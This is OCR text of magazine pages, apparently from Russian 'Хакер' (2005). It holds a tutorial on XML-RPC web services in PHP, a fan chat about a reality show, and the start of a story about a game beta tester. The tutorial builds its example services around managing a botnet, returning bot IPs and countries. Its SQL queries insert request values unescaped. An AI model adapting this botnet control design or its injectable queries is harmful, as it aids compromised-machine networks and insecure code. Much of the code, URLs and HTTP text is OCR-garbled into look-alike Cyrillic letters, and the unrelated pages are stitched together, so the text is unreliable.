[примеры сервисов] Хороший пример — организация ботнета, уп- 
равляемого по ПИр. Создавая десятки таких систем, люди обычно «го- 
родят какой-то огород» с управлением. Кто-то использует НТТР (ЗЕТ, 
кто-то передает запросы в виде отдельных переменных, посланных 
РОЗТ'ом. Но все эти данные обрабатываются в скрипте и это допол- 
нительный геморрой, особенно при мощной функциональности ботне- 
та и его распределенной структуре. Ну, представь, что для регистра- 
ции новых ботов используется не один сервер, а десяток. Нужно, во- 
первых, каким-то образом осуществлять взаимодействие между бота- 
ми и этими серверами, а во-вторых, обеспечить линковку между са- 
мими серверами регистрации, чтобы вся информация была доступна 
из единого «центра управления». Использование ХМІ_-ВРС здесь поз- 
волит, во-первых, сократить время на разработку управляющей сис- 
темы, во-вторых, легко подогнать и переделать ее под любого друго- 
го бота. Стоит ли говорить о максимальной совместимости и просто- 
те такого подхода. 

Другой пример — скажем, автоматический перевод текстов или 
проверка орфографии. При помощи ХМІ_-ВРС-запроса клиентское 
приложение (хоть плагин к браузеру) отправляет текст для обработ- 
ки и получает по этому же протоколу мгновенно ответ от системы. 
К слову, такие сервисы давным-давно уже есть в Сети, это не моя 
больная фантазия. 

Все плюсы использования ХМІ_-ВРС по достоинству оценила целая ку- 
ча разработчиков, которая активно использует ХМЬВРС в своих систе- 
мах. Ведь реализация этого протокола есть практически для любого 
языка программирования, и написать собственный ѵѵеЬ-сервис совсем 
несложно. В этом мы с тобой сегодня убедимся, но прежде давай я рас- 
скажу поподробнее, как функционирует протокол, как он выглядит и 
как им пользоваться. 

[как это работает] Следует понимать, что с точки зрения сетевого 
взаимодействия, обмен данными с ѵѵеЬ-сервисами осуществляется 
при помощи протокола ТСР и с использованием стандартного метода 
РОЗТ НТТР. В принципе, для ѵѵеЬ-сервера, обрабатывающего ХМІ_- 
ВРС запросы, это выглядит так же, как и обычная отправленная ме- 
тодом РОЗТ форма: те же данные, передача их выполняемому прило- 
жению, чтение его потока вывода и выплевывание этих данных кли- 
енту. Все, как и прежде, за исключением того, что для транспортиров- 
ки непосредственно ДАННЫХ используется новый протокол- 
надстройка над НТТР, который стоит на уровень выше. Ведь все дан- 
ные упаковываются в ХМІ_-представление и в этом виде передаются 
по НТТР. Само приложение их извлекает из тела ХМЬдокумента, не- 
которым способом их обрабатывает и генерирует ответ, представлен- 
ный в виде ХМІ_-документа. 

Как легко понять, после создания ѵѵеЬ-сервиса, необходимо наколба- 
сить и клиента, чтобы конечные пользователи могли использовать этот 
сервис. Для этого необходимо предоставить информацию об интер- 
фейсе сервиса, о его АРІ. Эта информация, собственно, и делает ѵѵеЬ- 
сервис доступным для всей Сети, предоставляя сторонним разработчи- 




спецификация стандарта ХМЬ-РРС 



кам возможность легко и быстро писать приложения для общения с 
твоим сервисом. 

В настоящий момент уже даже существует специальный язык 
ѴѴЗЭІ- (ѴѴеЬ Зегѵісез Оезсгірііоп І_апдиаде — Язык Описания ѴѴеЬ- 
Сервисов), который активно разрабатывается и предназначен как 
раз для описания АРІ-интерфейсов. Думается, что при его исполь- 
зовании в некоторых случаях разработку клиентов можно будет во- 
обще автоматизировать. 

Так же сервис обладает некоторой идентифицирующей его информа- 
цией о типе и описании предоставляемой информации — эти данные 
планируется использовать для формирования единой базы данных с 
описанием всех сервисов Интернета. 

[описание] На самом деле, чтобы создавать ѵѵеЬ-сервисы и не надо 
знать ничего о том, как работает ХМІ_-ВРС. Ведь использовать браузер 
можно, не читая спецификаций НТТР. Но такие знания не будут лишни- 
ми. Поэтому мы с тобой сейчас разберемся с тем, как функционирует и 
устроен протокол, рассмотрев на практике его работу. 

Запрос в ХМІ_-ВРС состоит из двух частей: метода и блока параметров. 
Каждому методу можно поставить в условное соответствие некоторую 
функцию, определенную на твоем языке программирования. Понятно, 
что параметры — это передаваемые нашим функциям переменные. Па- 
раметры могут быть разнотипые по своей природу: строки, целые чис- 
ла, массивы — поддерживаются основные структуры данных. Помимо 
этого в ХМІ_-ВРС присутствуют дополнительные тэги для обработки 
ошибок, но я об этом рассказывать не буду. Если это и впрямь тебе ин- 
тересно, стоит обратиться к документации на нашем диске. 

Весь процесс взаимодействия при помощи ХМЬВРС между клиен- 
том и сервером начинается с клиентского запроса. Запрос всегда со- 
держит название метода, и, возможно, набор необходимых парамет- 
ров. Серверная часть анализирует запрос, выполняет необходимые 
действия и возвращает клиенту ответ, состоящий из набора интере- 
сующих данных. 

По существу такое общение мало отличается от локального вызова 
процедур. Все тоже самое: определяется имя функции, фиксируется 



АЛЬТЕРНАТИВНЫЕ ПАКЕТЫ 

Вообще, реализация ХМІ__РРС есть 
для кучи самых разных языков и в са- 
мых разных вариантах. Полный список 
всех разработок можно найти на сайте 
ѵѵтѵ.хрІгрс.сот, на странице ітріетеп- 
Іайопз. Я же расскажу об основных 
разработках, предназначенных для ис- 
пользования совместно с РНР. 

► рНрРРС (Шр://рМргрс.зоигсеІогде.пеі). 
Это крутой и навороченный по функ- 
циональности РНР-класс. Програм- 
мисты, которые его создали, решили 
не ограничивать себя только лишь ге- 
нерацией и парсингом ХМІ__НРС- 
транзакций. Их детище предоставля- 



ет возможности по взаимодействию с 
«абстрактными», удаленными базами 
данных, через интерфейс ХМІ__НРС. 
Вообще, проект создается для совме- 
стного использования с Хоорз. 

► ХМІ_РРС-ЕРІ (Ыір://хтІгрс- 
ері.зоигсеіогде.пеі). Этот пакет 
представляет собой класс, написан- 
ный на С++ и, само собой, для уста- 
новки необходимо иметь достаточ- 
ные права и доступ к компилятору — 
надо будет пересобирать РНР. Само 
приложение не поражает функцио- 
нальностью: оно лишь парсит запро- 
сы и ответы ХМЬРРС, но не занима- 
ется их передачей. Использовать эту 



штуку без конкретной и осознанной 
необходимости в компилируемом ре- 
шении я бы не советовал. 

► ХМЫЯРС СІіепі/Зегѵег Кейта Де- 
вин са ( уѵуѵуѵ .кеіііпсіе ѵепз . сот/зоіШа - 
ге/хтігрс). Чувак по имени Кейт на- 
писал, наверное, самый удобный 
для новичков пакет для работы с 
ХМЬВРС. Все предельно просто: 
есть набор описанных функций, ко- 
торые подключаются к твоим сцена- 
риям и могут легко использоваться. 
Никакой возни с объектами — все 
просто и линейно. Можно посовето- 
вать этот пакет тем, кого пугают 
прелести ООП. 



[ХАКЕР 11 [83] 05 > КОДИНГ 125 ] 
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вот так выглядит общение между сервером и клиентом при помощи ХМІ__ВРС 



набор параметров, получается результат работы. 

Чтобы не быть голословным, рассмотрю конкретный пример ХМЫЯРС- 
запроса для сервера: 

[пример запроса] 

Р03Т /хтігрс.ріір НТТР/1.1 
ІІзег-АдепІ: СооІ ХМІ.-ВРС СІіепІ ѵ Х.Х 
Нозі: сооі.хті.грс.зегѵісе.сот 
СопІепМуре: ІехІ/хтІ 
<?хтІ ѵег5іоп="1.0"?> 
стеФосЮаІЬ 

<теШосіМате>деШитЬегВоІ5</теШосіМате> 

<рагатз> 

<рагатхѵаІие><іпЫЗ</іпЬ</ѵаІиех/рагат> 

</рагатз> 

</теШосІСаІІ> 

Ответ ѵѵеЬ-сервиса выглядит примерно следующим образом: 

[ответ ѵѵеЬ-сервиса] 

НТТР/1.1 200 ОК 

йаіе: Моп, 10 Осі 2005 19:36:56 6МТ 
Зегѵег: АрасІіе/1.3.29 (ІІпіх) 

Х-Ро\л/егесІ-Ву: РНР/5.0.1 
СопІепМепдШ: 138 
Соппесііоп: сіозе 

СопІепІ-Туре: ІехІ/хтІ; сііагзеЫІТР-8 
<?хтІ ѵегзіоп="1.0" епсосІіпд="ІІТР-8"?> 

<теШосіВе5роп5е> 

<рагатз> 

<рагат> 

<ѵаІиехіпЬ1 6</іпЬ</ѵаІие> 

</рагат> 

</рагатз> 

</теШосіВе5роп5е> 

Думаю, на этом можно завершить рассказ о самом протоколе ХМЫЯРС. 
Ты получил примерное представление о нем, и этого достаточно для 
дальнейшего понимания статьи. Тем более, что всю работу по составле- 
нию, парсингу запросов и ответов берут на себя различные расширения, 



которые можно найти почти для любого языка программирования. Они 
поставляются в самых разнообразных вариантах — в виде сІІІ, РНР-клас- 
сов и модулей, для установки которых нужно пересобирать интерпрета- 
тор твоего языка. Мы для простоты и удобства будем использовать в на- 
ших разработках РНР. В качестве реализации ХМЫЯРС я выбрал пакет, 
поставляемый через РЕАВ: Шр://реаг.рІір леі/ра скаде/ХМІ_НРС. Это 
быстро и удобно. Если тебе интересно узнать об альтернативных паке- 
тах, то почитать об этом можно в соответствующей врезке. 

[свой сервис] Сейчас настало время написать свой собственный 
ѵѵеЬ-сервис. Давай с тобой наколбасим для начала элементарный сер- 
вис с одним-единственным методом. Что-нибудь учебное. Пусть, ска- 
жем, наш сервис получает единственный параметр — дату и возвраща- 
ет в ответ число зарегистрированных в этот день ботов, осуществляя 
соответствующий запрос с базе данных. Первым делом установки 
РЕАВ-расширение ХМІ__ВРС: 

$ реаг іпзіаіі ХМІ__ВРС 

Или можно просто руками скачать с сайта архив с нужными скриптами. 
Затем уже можно приступать к написанию серверной части нашего при- 
ложения. Любое описание сервиса всегда начинается с подключения 
файла Зегѵег.рГір, в котором находится описание всех необходимых нам 
служебных классов. Поскольку я не пользовался реаг іпзіаіі, а просто ско- 
пировал исходники в папку со скриптом, то у меня это выглядит вот так: 

гедиіге_опсе 'ХМІ__ВРС-1 .4.3/Зегѵег.рИр'; 

Затем необходимо определить функцию, которая будет выполнять за- 
данное действие — считать ботов, я назвал ее ІЧитВоІз. Я приведу ее 
код и прокомментирую его чуть позже: 

Іипсііоп І\ІитВоІз($рагатз) { 

$рагат = $рагатз->де1Рагат(0); 
іі (!ХМІ_ВРС_ѴаІие::ізѴаІие($рагат)) { 
геіигп $рагат; 

} 

$ге=туздІ_диегу("5еІесІ * Ігот Ьоіз ѵѵііеге сІаІе^ед^рагат^зсаІап/аІО"'); 
$гп=туздІ_пит_го\л/5($ге); 

$ѵаІ = пеѵѵ ХМІ__ВРС_ѴаІие($гп, ’іпі'); 
геіигп пеѵѵ ХМІ__ВРС_Везроп5е($ѵаІ); 

} 



ШИЛО НА МЫЛО 

Ты наверняка слышал о такой ве- 
щи, как стандарт ЗОАР (Зітріе 
ОЬіесі Ассезз Ргоіосоі). Эта техно- 
логия служит для «упаковки» раз- 
нообразных данных при обмене 
между двумя узлами какой-то сис- 
темы. ЗОАР — это ХМЬпротокол, 
работающий поверх одного из ста- 
рых ѵѵеЬ-протоколов, чаще всего — 
НТТР. В некотором смысле, ЗОАР 



— это конкурирующий с ХМЬВРС 
стандарт, которому даже хотят 
дать рекомендации ѴѴЗС. ЗОАР 
значительно сложнее ХМЫЯРС, об 
этом адекватно можно судить по 
объему спецификации: документ, 
описывающий работу ЗОАР, весит 
примерно в 10 раз больше, чем 
описание ХМЫЯРС. 

Сравнивать эти стандарты — заня- 
тие неблагодарное, однако если тебе 



интересно почитать об этом, советую 
обратиться к статье ХМЫЯРС ѵз 
ЗОАР (Мір://уѵеЫод.та5икоті.огд/тіі- 
іпд5/хтІ-грс_ѵ5_зоар.Ыт). Вообще, 
считается, что ЗОАР — это будущее 
разработок. Однако не стоит думать, 
что ХМЫЯРС — гнилая вещь. Дело в 
том, что любой ХМЫЯРС запрос мо- 
жет быть легко переконвертирован в 
соответствующее ЗОАР-приложение 
при помощи Х31_Т. 





Легко понять, что $рагатз — это переменная 
класса, получение параметров осуществляется 
при помощи метода деІРагат(). Затем происхо- 
дит проверка на корректность полученных дан- 
ных, составляется элементарный запрос, счита- 
ется количество возвращенных записей, созда- 
ется новая переменная класса ХМІ__ВРС_ѴаІие, 
а затем возвращается ответ сервера. 

После описания процедуры необходимо соз- 
дать экземпляр ХМІ__ВРС_Зегѵег и сопоста- 
вить символическому методу питЬегОІВоІз на- 
шу функцию ЫитВоІз. Делается это так: 

$зегѵег = пеѵѵ ХМІ__ВРС_Зегѵег( 
аггау( 

'питЬегОІВоІз' => 
аггау( 

Типсііоп' => 'ІМитВоІз' 

) 

)); 

?> 

Вот, в общем-то, и все :). Согласись, все чрезвы- 
чайно просто. Но чтобы придать законченность 
нашей системе, необходимо написать еще клиент- 
скую часть. Первая строка у всех клиентов оди- 
наковая, нужно подключить файл ВРС.рНр: 

гедиіге_опсе 'ХМІ__ВРС-1 .4.3/ВРС.рИр'; 

Затем из передаваемой ОЕТ'ом переменной 
$_ѲЕТ[сІаІе_г] нужно сделать массив перемен- 
ных ХМІ__ВРС_ѴаІие: 

$рагатз = аггау(пеѵѵ ХМІ_ВРС_ѴаІие($_6ЕТ[сІа- 
Іе_г], 'зігіпд')); 

Обрати внимание, что конструктор этого клас- 
са первым параметром принимает сами дан- 
ные, а во втором указывается тип — в нашем 
случае — строка зігіпд. После этого создается 
ВРС-сообщение, которое вызывает метод, пе- 
редавая ему параметры $рагатз: 

$тзд = пеѵѵ ХМІ_ВРС_Мез5аде('питЬегОІ- 
Воіз', $рагатз); 

Затем необходимо создать клиента и отослать 
наше сообщение: 

$сіі = пеѵѵХМЦЗРС^ІіепІ('Ле/зе.р!ір', 'ігеШпіпз.ги'); 
$гезр = $сІі->зепсі($т5д); 

После этого происходит обработка ошибок: 

і! (!$гезр) { 

есйо 'Ошибка связи:' . $сІі->еггзІг; 
ехіі; 

} 

і! ( ! $гезр->Таи ІЮосІеО) { # Не случилось ошибок 
$ѵаІ = $гезр->ѵаІие(); 

есбо 'За '.$_6ЕТ[ба1е_г].' зарегистрировано 
'.$ѵаІ->зсаІагѵаІ().' ботов'; 

} еізе { 

есбо 'Код ошибки: ' . $гезр->ІаиІІСосІе() . 

"\п"; 

есбо 'Причина ошибки: ' . $гезр->ІаиІІЗІгіпд() . "\п"; 

} 

Вот так выглядит создание элементарного сер- 
виса и клиента к нему. 

[структуры посложнее] Теперь расскажу о 
том, каким образом возможно транспортиро- 
вать нескалярные переменные вроде массивов 
и структур данных. Действительно, очень часто 
в этом есть огромная необходимость. Ну, ска- 



жем, в нашей воображаемой распределенной 
системе управления ботнетом может появиться 
необходимость получить всю информацию о бо- 
тах, зарегистрированных за определенную дату 
на определенном сервере, а не просто пересчи- 
тать их, как мы это делали в примере выше. 
Сейчас я покажу тебе, каким образом сервер 
может ответить клиенту массивом данных. Но- 
вая функция, которая будет ассоциирована с 
методом ѴіеѵѵВоІІпІо, который мы добавим к на- 
шему сервису, называется Воііпіо: 

[функция, которая возвращает массив 
структур с информацией о ботах] 

Іипсііоп Во11п!го($рагатз) { 

$рагат = $рагатз->де1Рагат(0); 
$ге=туздІ_диегу("зеІес1: * Ігот Ьоіз ѵѵііеге 
баІе_гед='$рагат->5саІагѵаІ()'"); 

$ѵаІ=пе\л/ ХМІ__ВРС_ѴаІие(); 

$ЬоІз=аггау(); 

$і=0; 

\л/ЫІе($гез=туздІ_ІеІс[і_аггау($ге)) { 
$ЬоІз[$і]=пе\А/ ХМІ__ВРС_ѴаІие(аггау( 

"ір" => пеѵѵ ХМЕ_ВРС_ѴаІие("$гез[ір]"), 
"соипігу" => пеѵѵ ХМ Ь_В РС_ѴаІ и е ("$гез [со и пігу] ") , 
"сМе_Г => пе\л/ ХМи_ВРС_Ѵа1ие("$гез[сіа1:е_г]")) , "зішсО; 
$і++; 

} 

$ѵаІ->абсіАггау($ЬоІ5); 

геіигп пеѵѵ ХМІ_ВРС_Везроп5е($ѵаІ); 

} 

Видно, что в первых двух строчках функции я 
получаю параметр — дату для выборки и соз- 
даю ЗОЬзапрос к базе данных. Затем создает- 
ся переменная $ѵаІ класса ХМІ__ВРС_ѴаІие, 
инициализируется массив $Ьо1з с ботами. Пос- 
ле этого в цикле по всем возвращенным запро- 
сом записям таблицы этот массив заполняется 
структурами, несущими информацию о ботах. 
Разумеется, все это условно, реальные струк- 
туры могут быть значительно сложнее, но об- 
щий принцип именно такой. 

После этого цикла, когда создан «массив бо- 
тов», необходимо из этого массива изготовить 
переменную класса ХМІ__ВРС_ѴаІие. Для чего 
к уже созданному объекту, при помощи метода 
асІсІАггау(), добавляется наш массив. 
Клиентская сторона, которую так же необходи- 
мо реализовать, работает аналогично уже ра- 
зобранному случаю. С той лишь разницей, что 
$ѵаІ = $гезр->ѵаІие() — это не массив в привыч- 
ном понимании этого слова. Это переменная 
ХМІ__ВРС_ѴаІие, а доступ к элементам массива 
должен осуществляться при помощи метода 
аггаутет(). Например, $ѵа1->аггаутет(0) вернет 
переменную ХМІ__ВРС_ѴаІие элемента с нуле- 
вым индексом. В нашем случае это — структура 
с информацией о ботах. Получить конкретные 
значения полей можно следующим образом: 
$ѵаІ->аггаутет(0)->5ІгисІтет("ір")->зсаІагѵаІ(). 

[выводы] Может показаться, что использование 
этой системы подразумевает недюжинный объе- 
ктный геморрой. И хоть это может сначала пока- 
заться громоздким и неудобным, но это не так. 
Стоит поработать с системой хотя бы 15 минут, 
как все становится понятно, привычно и удобно. 
Если же ты на дух не переносишь объектный 
подход, советую обратиться к другим реализа- 
циям ХМІ__ВРС. Информацию о них ты найдешь 
в соответствующей врезке. Все напечатанные в 
статье скрипты, дополненные и дописанные, 
оформленные в виде полноценного тестового 
примера, ты отыщешь на нашем диске, там же 
найдется масса нужной документации © 
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ѵ_1ете (вчера, 22:58) 

Тут слухи дошли, что Тарантино 

собирается приехать на съемки Голода* 

в Нью-Йорк. Типа звать сниматься 

в своем новом блокбастере ;) 

иго (вчера, 23:04) 

да, точно а на главную роль самого 

крутого мужика взять Акимова! 

Акимов - новый Брюс наш Виллис ! 
Иопеу (вчера, 23:32) 

Гламура у него нет - не покатит ваще 
никак... 

кх (26 сен, 00:01) 

Ничо, может Наташка даст ему пару раз 
все таки - вот гламур и появится ! 
ѵ_1ете (сегодня, 00:18) 

Такая звезда Акимову не светит :) А вот 
Ярик реально может хоть сейчас сыграть 
роль пришельца с далеких галактик ))) 
иго (сегодня, 00:25) 
скоро! смотрите блокбастер Голод 3 
от Квентина Тарантино. 13 русских 
без денег захватывают телевизоры 
всего мира! 

ѵ_1ете (сегодня, 02:58) 

Точно: Ярик играет пришельца, 
а Немова - принцессу Лию в золотом 
бикини... Может, хоть в кино у них секс 
будет? Если уж в жизни не получается... 

кх(сегодня, 03:00) 

Реально, Ярик и Катя достойны 
Тарантино:) 

§ирег(сегодня, 12:05) 

Да лана! Овчинникова - лучше всех! 

В своих коротеньких белых шортиках 
она просто вылитая Анжела Девис! 

И вообще - ее уже пригласили на гл. 
роль в одном сериале ... 
кх(сегодня, 03:00) 

Откуда знаешь? 

§ирег(сегодня, 12:05) 

Да об этом все знают! 
тіііу (сегодня, 12:10) 

Да, Овчинникова будет играть девушку 
из провинции, которая хочет стать 
звездой, а в нее влюбится богатый 
продюсер и решит помочь ей. 

А еще в нее влюбится другой продюсер, 
а она его пошлет, потому что ей нравится 
первый. А тот будет за это мстить ей... 



*Реалити-шоу «Голод. Нью-Йорк» на ТНТ 
каждый день в 20-00. 
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Автор иллюстраций Иван Величко (ѵеІ@5Гіика.ги) 

Тестер 



«ЗДРАВСТВУЙТЕ, АНДРЕЙ, МЫ ПОЛУЧИЛИ ВАШУ ЗАЯВКУ И ОЗНАКОМИЛИСЬ С ОСТАВЛЕННОЙ ВАМИ АНКЕ- 
ТОЙ. С РАДОСТЬЮ СООБЩАЕМ ВАМ, ЧТО МЕЗА ВСТУПИЛА В СТАДИЮ БЕТА-ТЕСТИРОВАНИЯ И ВЫ СТАЛИ ОД- 
НИМ ИЗ 20 ВЫБРАННЫХ ТЕСТЕРОВ, КОТОРЫЕ ПРИГЛАШАЮТСЯ ПЕРВЫМИ ИСПЫТАТЬ НА СЕБЕ ВОЗМОЖ- 
НОСТИ ИГРЫ. 13 СЕНТЯБРЯ В 11:00 МЫ ЖДЕМ ВАС В НАШЕМ ОФИСЕ, АДРЕС КОТОРОГО ВЫ НАЙДЕТЕ НИЖЕ. 
ТАМ ВЫ УЗНАЕТЕ ВСЕ ПОДРОБНЕЕ. СПАСИБО ЗА ТО, ЧТО СОГЛАСИЛИСЬ ПОМОЧЬ НАМ СДЕЛАТЬ МЕЗУ 
ЛУЧШЕ. С УВАЖЕНИЕМ, ЛЮДМИЛА ЧИСТЯКОВА. КОМПАНИЯ «ВР ИНСАЙД» I тіпс1\л/0гк (тіпсІ\А/Огк@датеІапсІ.гц) 



Часть первая 

Письмо оказалось, мягко говоря, неожиданным. Заявку тестера Андрей 
оставил на сайте компании 5 лет назад. Тогда он, как и все, очень ждал 
эту игру, надеялся, что хотя бы половина заявленных разработчиками 
возможностей сбудется. 

Впервые о начале работы над игрой было объявлено в 2001 году. Меза 
обещала совершить революцию в реалистичности компьютерных игр. 
Два скриншота, полученные из неизвестных источников и больше напо- 
минающие фотографии, были тому наглядным подтверждением. Но да- 
же не фотореалистичная графика и интерактивность привлекали гейме- 
ров. По уверению разработчиков, для каждого игрока мир Мезы стано- 
вился другим. Включая окружение, персонажей и события. «Мы не соз- 
даем мир. Мы даем возможность игроку самостоятельно построить тот 
мир, который он хочет», — говорилось в небольшом пресс-релизе. Как 
это реализовать, никто не знал. 

А потом были долгие годы затишья. Журналисты первое время пыта- 
лись выудить свежую информацию о Мезе, но разработчики отказыва- 
лись ее предоставлять. Официальный сайт «ВР Инсайд», на котором 
когда-то можно было найти кое-какие подробности и оставить заявку на 
будущее тестирование, со временем был закрыт. И все, конечно, поду- 
мали, что проект заморозили. Ведь многие слишком амбициозные про- 
екты ждет именно такая судьба. И вот теперь это письмо... 

Андрей вспомнил, что Жорик тоже посылал такую заявку 5 лет назад. 
Друг как всегда сидел в аське. 

— Хай. Ты тоже получил письмо от «ВРИ»? - отправил ему мессагу Анд- 
рей. 

— Что за ВРИ? 

— «ВР Инсайд». Меза, помнишь? 

— Еще помню, но уже начинаю забывать. Ее же прикрыли? 

— Это мы так думаем. Мне в ящик только что прислали мессагу с приг- 
лашением стать бета-тестером. 

— Нифига себе. Может развод? 



— Непохоже. Адрес их бывший реальный. Да и кому это надо? 

— Я бы тоже потестил. Интересно, что у них в итоге вышло? 

— Посмотрим. В среду к ним иду, если что, расскажу потом. 

— О’кей. 

* * * 

Будильник беспощадно звонил над самым ухом, не давая никакой воз- 
можности снова заснуть. Андрей сладко потянулся и вскочил с койки. 
Первым делом он проверил почту, но среди спама не оказалось ни одно- 
го полезного письма. После этого прочитал новые мессаги на родных иг- 
ровых форумах, ответив на некоторые из них. И только потом пошел в 
ванную умываться и чистить зубы. Часто он забывал это делать, но в 
этот день хотел выглядеть прилично и даже откопал в недрах шкафа све- 
жую футболку. Насколько он помнил из давнего объявления о наборе 
тестеров, «ВР Инсайд» обещала неплохие деньги. А баблишко ему сей- 
час бы не помешало. После того как несколько месяцев назад его уволи- 
ли с должности дизайнера в редакции, Андрей перебивался редкими 
фриленс-заказами. Зарабатывал ровно столько, чтобы хватало на опла- 
ту однокомнатной квартиры на окраине Москвы, еду и Интернет. Ему 
больше ничего и не нужно было. Все свое время Андрей проводил в он- 
лайновых играх и Интернете, где чувствовал себя как рыба в воде. Он 
уже имел опыт тестирования и даже участвовал в доработке популярной 
ОиіІсІ ѴѴагз. Стать тестером популярной игры не так просто. Конкуренция 
была большая, и нужно как-то убедить разработчика, что именно ты 
справишься с задачей лучше остальных. Поэтому нередко приходится 
прибегать к разным хитростям, вводить не совсем правдивые данные. 
Нередко Андрей представлялся журналистом русского компьютерного 
журнала или «слегка» завышал свой игровой стаж. Зато он мог первым 
попасть в новые компьютерные миры, исследовать земли, где еще ник- 
то, кроме разработчиков не бывал. Наверное, что-то подобное ощущал 
Колумб, когда впервые ступил на американский материк. 

Андрей даже придумал себе и таким, как он, определение — онлайне- 
ры. Так он называл людей, которые предпочитают виртуальные миры 




реальным и практически не общаются со Вселенной по ту сторону квар- 
тиры. Правда, раз в две недели они с Жориком встречались в одной из 
московских кафешек, пили пиво и болтали о своем. Чатиться по аське 
или в окошке онлайновых игр было намного проще и привычнее, но ре- 
альные встречи проходили не для непосредственного общения. Андрей 
бы назвал это традицией, но чувствовал, что это для того, чтобы не ока- 
заться совсем оторванными от реального мира. 

Часы показывали начало одиннадцатого. Пора было ехать по указанно- 
му в письме адресу. 

* * * 

Андрей никогда раньше не был в этом районе. От метро пришлось ехать 
на маршрутке 7 минут, потом еще минут 10 добираться пешком. Дома 
кругом были старенькие, еще Сталинских времен. Во двориках сидели 
старушки и о чем-то оживленно общались. Никто из тех, у кого он спро- 
сил о местонахождении «ВР Инсайд», ничего об этом не знал. Андрей 
уже начал подумывать, не являлось ли письмо действительно шуткой. 
Или «мертвой петлей». Он как-то слышал историю о том, как мать полу- 
чила электронное сообщение от своего погибшего несколько месяцев 
назад сына. Пробыла в истерике три дня, а потом оказалось, что из-за 
какой-то ошибки почтового сервера, мессага затерялась и через полго- 
да всплыла сама собой. 

Здание вынырнуло из старых двориков совершенно неожиданно. Сов- 
ременное, окруженное невысоким белым забором, чистое и так непохо- 
жее на соседние серые пятиэтажки. Перед входом виднелся щит: «Част- 
ная собственность. Вход только по пропускам». Рядом также стояла 
стеклянная будка, в которой можно было увидеть силуэт охранника. 
Номер дома, обозначенный на заборе, не оставлял сомнений - именно 
здесь находился офис «ВРИ». 

— Сколько же денег понадобилось, чтобы отгрохать такой комплекс, - 
подумал Андрей. Обычно молодые софтварные компании, которые толь- 
ко начинают осваиваться в мире компьютерных игр, довольствуются 
арендой недорогого помещения. А тут чуть ли не голливудская студия. 
Андрей направился к будке. 

— Вы к кому, молодой человек? - спросил усатый охранник, на бейдже 
которого красовалось слово Зесигііу. Андрей представился, и охранник 
по рации сообщил о его приходе. Встретить гостя вышла молодая жен- 
щина в строгом бежевом костюме. 

— Здравствуйте, Андрей. Спасибо, что пришли. Я — Людмила, и имен- 
но от меня вы получили письмо. Прошу за мной. 

Внутри здание было еще роскошнее. Нет, там не было картин Моне на 
стенах и золотых статуй. Более того, во входном зале и коридорах не 
было ничего лишнего. Но отделка, архитектура, ковры — все говорило 
о том, что работа была проделана большая и «влетела» в копеечку. По- 
ка они шли по коридору, Людмила рассказывала о компании. 



— Я удивился, когда получил письмо, думал, что игру уже давно прек- 
ратили делать, - признался Андрей. 

— Мы не только не прекратили ее делать. В последние пару лет разра- 
ботки велись в усиленном режиме. Решение не публиковать информа- 
цию до выпуска игры принял наш директор. Дело в том, что Меза - не 
простая игра. Это развлечение нового поколения, мы использовали при 
ее создании совершенно новые технологии и подход. Нам не хотелось, 
чтобы конкуренты узнали обо всем заранее, к тому же эффект от игры, 
если игроки не будут подготовлены, окажется намного сильнее. После 
того как игра пройдет стадию бета-тестирования, мы обязательно выло- 
жим информацию в свободный доступ. 

— А когда она будет окончательна готова? 

— Можно сказать, она готова уже сейчас. Но мы должны убедиться, что 
все в порядке и игроки получают от нее именно то, что хотят. Именно 
для этого мы вас и пригласили, — улыбнулась Людмила. 

— А остальные тестеры уже пришли? 

— Да, большинство уже здесь и ждут нас в презентационном зале. 
Андрей попытался узнать об игре подробнее, но Людмила отделалась 
общими фразами, уверяя, что он скоро все увидит сам. 

— Ну вот мы и пришли, — сообщила женщина, открывая обитую ко- 
жей дверь. 

Презентационный зал представлял собой просторное помещение, где 
главным украшением был огромный проектор. Перед ним стояли ряды 
стульев, за которыми сидели ребята в возрасте от 15 до 25. А перед про- 
ектором находился невысокий мужчина лет 35 в легком бежевом свите- 
ре и темных штанах. 

— Это Олег Николаевич, он руководит отделом исследований, - тихо 
представила Людмила. 

Жестом пригласив Андрея садиться, Олег Николаевич объявил: 

— Ну что ж, больше никого ждать не будем. Хочу вас всех поблаго- 
дарить за то, что собрались здесь. Мы работали над игрой Меза бо- 
лее 7 лет и скоро представим ее широкой публике. Но сперва хотим 
услышать ваши впечатления. Вы окунетесь в мир, которому по реа- 
листичности нет равных среди современных компьютерных игр. Для 
некоторых Меза покажется реальнее окружающего вас мира, и ник- 
то не может предсказать, чем это для вас обернется. Документаль- 
ный фильм, который мы сняли для вас, познакомит с историей соз- 
дания Мезы и нашей командой. 

Оратор отошел, и сразу после этого в зале погас свет, а на проекторе 
вспыхнуло изображение. Громкий голос диктора начал рассказывать о 
том, какими были игры в конце 90-х, как молодому бизнесмену пришла 
идея Мезы и как он основал ВРИ, о новых технологиях, применяемых в 
игре, и том, как достигается ощущение реальности происходящего. 
Фильм был очень интересным и познавательным, после него уже не тер- 
пелось взглянуть на детище компании. 
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Когда он закончился и зажегся свет, Олег Николаевич раздал всем ре- 
бятам бумажные листки, заполненные печатным текстом, и ручки. 

— Это договор, в котором говорится, что мы нанимаем вас на работу в 
качестве тестера игры Меза. Здесь объясняются ваши задачи и условия 
работы, а также указана заработная плата. Ознакомьтесь, пожалуйста. 
Андрей изучил листок. В двух словах его задачи можно было выразить 
так: нужно играть и рассказывать разработчикам о своих впечатлениях. 
Деньги платили каждую неделю — 200$, что для такой работы было не- 
вероятно щедро. Конечно, строго запрещалось передавать на сторону 
любую информацию, связанную с деятельностью компании. Немного 
смущали отдельные пункты, но Андрею они показались причудой соста- 
вителя, так что он не обратил на них большого внимания. 

— А когда можно будет приступить к работе? - спросил парнишка с не- 
послушной рыжей шевелюрой. 

— Сразу после того, как подпишете этот документ. Если хотите отказаться 

— сделайте это сейчас. После подписания договора обратной дороги нет. 
Андрей взял ручку и оставил внизу свой автограф. То же сделали все 
остальные ребята. Каждый был заинтригован и с нетерпением ждал пог- 
ружения в новый мир. 

— Ну а теперь пройдемте за мной. В соседней комнате мы приготовили 
для вас, как теперь уже наших внештатных сотрудников, небольшой 
фуршет. Там же вы получите коробки с игрой. 

* * * 

Андрей разулся, « футбол ьнул» кроссовки под шкаф и, сдирая на ходу с 
пакета бумагу, прошел к своему компьютеру. Внутри лежали ОѴО-шник 
и очки виртуальной реальности. ЭѴО-диск был самым обычным, без кра- 
сочных штампованных рисунков и эмблем. Просто болванка с пометкой 
«для бета-тестера». Подумать только, внутри этой алюминиевой жестян- 
ки помещался целый мир. Очки оказались легкими и изящными - ниче- 
